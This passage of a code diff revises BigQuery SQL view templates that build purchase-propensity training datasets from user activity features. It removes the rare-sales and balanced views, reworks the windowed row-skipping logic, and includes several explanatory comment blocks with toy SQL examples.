View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - will_purchase -FROM( -SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - 
will_purchase, - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_15_15` -) -WHERE - user_row_order = 1; - - --- This is a view preparing rows for purchase propensity modelling looking back 15 days and looking ahead 7 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_15_7` -( - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - will_purchase - ) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_15_7", - description="View Purchase Propensity Training dataset using 15 days back to predict 7 days ahead. 
View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - will_purchase -FROM( -SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - 
will_purchase, - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_15_7` -) -WHERE - user_row_order = 1; - - --- This is a view preparing rows for purchase propensity modelling looking back 30 days and looking ahead 15 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15` -(processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_15", - description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - * EXCEPT(feature_date, row_order_peruser_persplit) -FROM ( -SELECT DISTINCT - processed_timestamp, - user_pseudo_id, - data_split, - feature_date, - -- Now, I want to skip rows per user, per split every 15 days. 
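-- Illustrative aside, not part of this template: a runnable sketch of the row-skipping
-- technique used by these training views, shrunk to a 3-day window so it is easy to read.
-- Rows are numbered per user by feature_date ascending, and only every Nth row is kept via
-- MOD(row_order - 1, N) = 0, so consecutive training examples do not overlap in their label
-- windows. The `toy_daily_rows` CTE is a hypothetical stand-in for the training table.
WITH toy_daily_rows AS (
  SELECT 'userA' AS user_pseudo_id, d AS feature_date
  FROM UNNEST(GENERATE_DATE_ARRAY('2024-01-01', '2024-01-09')) AS d
)
SELECT user_pseudo_id, feature_date
FROM (
  SELECT
    user_pseudo_id,
    feature_date,
    ROW_NUMBER() OVER (PARTITION BY user_pseudo_id ORDER BY feature_date ASC) AS row_order_peruser
  FROM toy_daily_rows
)
-- Keep every 3rd daily row per user: 2024-01-01, 2024-01-04 and 2024-01-07.
WHERE MOD(row_order_peruser - 1, 3) = 0;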
- ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date ASC) AS row_order_peruser_persplit, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase -FROM( -SELECT DISTINCT - processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - 
add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase, - -- Number of rows per user, per day, per split. Only one row per user, per day, per slip. - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_15` -) -WHERE - row_order_peruser_perday_persplit = 1 -) -WHERE - --Skipping windows of 15 days, which is the future window size. - MOD(row_order_peruser_persplit-1, 15) = 0; - - -- This is a view preparing rows for purchase propensity modelling looking back 30 days and looking ahead 15 days. --- This specifically filter rows which are most recent for each user. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15_last_window` +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15` (processed_timestamp, data_split, user_pseudo_id, @@ -1665,14 +744,20 @@ CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_trainin will_purchase) OPTIONS( --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_15_last_window", + friendly_name="v_purchase_propensity_training_30_15", description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", labels=[("org_unit", "development")] ) AS +SELECT DISTINCT + * EXCEPT(feature_date, row_order_peruser_persplit) +FROM ( SELECT DISTINCT processed_timestamp, - data_split, user_pseudo_id, + data_split, + feature_date, + -- Now, I want to skip rows per user, per split every 15 days. + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date ASC) AS row_order_peruser_persplit, user_id, user_ltv_revenue, device_category, @@ -1752,6 +837,7 @@ FROM( SELECT DISTINCT processed_timestamp, data_split, + feature_date, user_pseudo_id, user_id, user_ltv_revenue, @@ -1828,15 +914,21 @@ SELECT DISTINCT checkouts_past_8_14_day, checkouts_past_15_30_day, will_purchase, - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date DESC) AS user_row_order - --ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order + -- Number of rows per user, per day, per split. Only one row per user, per day, per slip. + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_15` ) WHERE - user_row_order = 1; + row_order_peruser_perday_persplit = 1 +) +WHERE + --Skipping windows of 15 days, which is the future window size. + MOD(row_order_peruser_persplit-1, 15) = 0; + + -- This is a view preparing rows for purchase propensity modelling looking back 30 days and looking ahead 15 days. --- This is to be used in case recently no purchases are registered, and you don't have a way to train the classification model. 
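-- Illustrative aside, not part of this template: the `_rare_sales` view removed below
-- follows a simple fallback pattern for periods with no recent purchases. It takes the
-- regular last-window rows and UNION ALLs a small, capped set of historical positive
-- examples so the classifier always sees both classes. A runnable toy version of the
-- same pattern, with hypothetical CTEs standing in for the real views:
WITH recent_rows AS (
  SELECT 'userA' AS user_pseudo_id, 0 AS will_purchase UNION ALL
  SELECT 'userB', 0
),
historical_positives AS (
  SELECT 'userC' AS user_pseudo_id, 1 AS will_purchase UNION ALL
  SELECT 'userD', 1
)
SELECT user_pseudo_id, will_purchase FROM recent_rows
UNION ALL
(
  -- Cap the injected positives, mirroring the LIMIT 100 in the removed view.
  SELECT user_pseudo_id, will_purchase FROM historical_positives LIMIT 1
);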
-CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15_rare_sales` +-- This specifically filter rows which are most recent for each user. +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15_last_window` (processed_timestamp, data_split, user_pseudo_id, @@ -1917,115 +1009,12 @@ CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_trainin will_purchase) OPTIONS( --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_15_rare_sales", + friendly_name="v_purchase_propensity_training_30_15_last_window", description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", labels=[("org_unit", "development")] ) AS SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase - FROM - (SELECT DISTINCT - * - FROM `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15_last_window` - ) - UNION ALL - ( - SELECT DISTINCT - * EXCEPT(user_row_order, feature_date) - FROM( - SELECT DISTINCT - *, - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_15` - WHERE will_purchase = 1 - ) - WHERE - user_row_order = 1 - LIMIT 100 - ) -; - --- This is a view preparing rows for purchase propensity modelling looking back 30 days and looking ahead 15 days. --- This balances out the dataset, in case you need the purchase propensity model to split customer in two classes: future purchases and non-purchases. 
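-- Illustrative aside, not part of this template: the `_balanced` view removed below
-- downsamples the majority class. Rows are numbered at random within each will_purchase
-- class, and only as many rows are kept per class as there are positive examples. A
-- runnable toy version of the same idea, with a hypothetical `toy_training_rows` CTE:
WITH toy_training_rows AS (
  SELECT 'u1' AS user_pseudo_id, 0 AS will_purchase UNION ALL
  SELECT 'u2', 0 UNION ALL
  SELECT 'u3', 0 UNION ALL
  SELECT 'u4', 1
)
SELECT user_pseudo_id, will_purchase
FROM (
  SELECT
    user_pseudo_id,
    will_purchase,
    -- Random ordering inside each class makes the kept subset an unbiased sample.
    ROW_NUMBER() OVER (PARTITION BY will_purchase ORDER BY RAND()) AS rn
  FROM toy_training_rows
)
WHERE rn <= (SELECT COUNT(*) FROM toy_training_rows WHERE will_purchase = 1);
-- Returns the single positive row plus one randomly chosen negative row.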
-CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15_balanced` -(processed_timestamp, + processed_timestamp, data_split, user_pseudo_id, user_id, @@ -2102,111 +1091,10 @@ CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_trainin checkouts_past_7_day, checkouts_past_8_14_day, checkouts_past_15_30_day, - will_purchase) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_15_balanced", - description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS - SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase - FROM ( - SELECT - DISTINCT *, - ROW_NUMBER() OVER (PARTITION BY will_purchase ORDER BY RAND()) AS rn - FROM - `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15` ) - WHERE - rn <= ( - SELECT - COUNT(will_purchase) - FROM - `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_15` - WHERE - will_purchase = 1) -; - - -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30` -(processed_timestamp, + will_purchase +FROM( +SELECT DISTINCT + processed_timestamp, data_split, user_pseudo_id, user_id, @@ -2283,23 +1171,20 @@ CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_trainin checkouts_past_7_day, checkouts_past_8_14_day, checkouts_past_15_30_day, - will_purchase) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_30", - description="View 
Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - * EXCEPT(feature_date, row_order_peruser_persplit) -FROM ( -SELECT DISTINCT - processed_timestamp, + will_purchase, + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date DESC) AS user_row_order + --ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order + FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_15` + TABLESAMPLE SYSTEM (1 PERCENT) +) +WHERE + user_row_order = 1; + + +CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30` +(processed_timestamp, data_split, user_pseudo_id, - feature_date, - --Now, I want to skip rows per user, per split every 15 days. - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date ASC) AS row_order_peruser_persplit, user_id, user_ltv_revenue, device_category, @@ -2374,13 +1259,23 @@ SELECT DISTINCT checkouts_past_7_day, checkouts_past_8_14_day, checkouts_past_15_30_day, - will_purchase -FROM( + will_purchase) +OPTIONS( + --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), + friendly_name="v_purchase_propensity_training_30_30", + description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", + labels=[("org_unit", "development")] +) AS +SELECT DISTINCT + * EXCEPT(feature_date, row_order_peruser_persplit) +FROM ( SELECT DISTINCT processed_timestamp, data_split, - feature_date, user_pseudo_id, + feature_date, + --Now, I want to skip rows per user, per split every 15 days. + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date ASC) AS row_order_peruser_persplit, user_id, user_ltv_revenue, device_category, @@ -2455,22 +1350,12 @@ SELECT DISTINCT checkouts_past_7_day, checkouts_past_8_14_day, checkouts_past_15_30_day, - will_purchase, - -- Number of rows per user, per day, per split. Only one row per user, per day, per slip. - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_30` -) -WHERE - row_order_peruser_perday_persplit = 1 -) -WHERE - -- Skipping windows of 30 days, which is the future window size. - MOD(row_order_peruser_persplit-1, 30) = 0; - - -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30_balanced` -(processed_timestamp, + will_purchase +FROM( +SELECT DISTINCT + processed_timestamp, data_split, + feature_date, user_pseudo_id, user_id, user_ltv_revenue, @@ -2546,107 +1431,17 @@ CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_trainin checkouts_past_7_day, checkouts_past_8_14_day, checkouts_past_15_30_day, - will_purchase) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_30_balanced", - description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. 
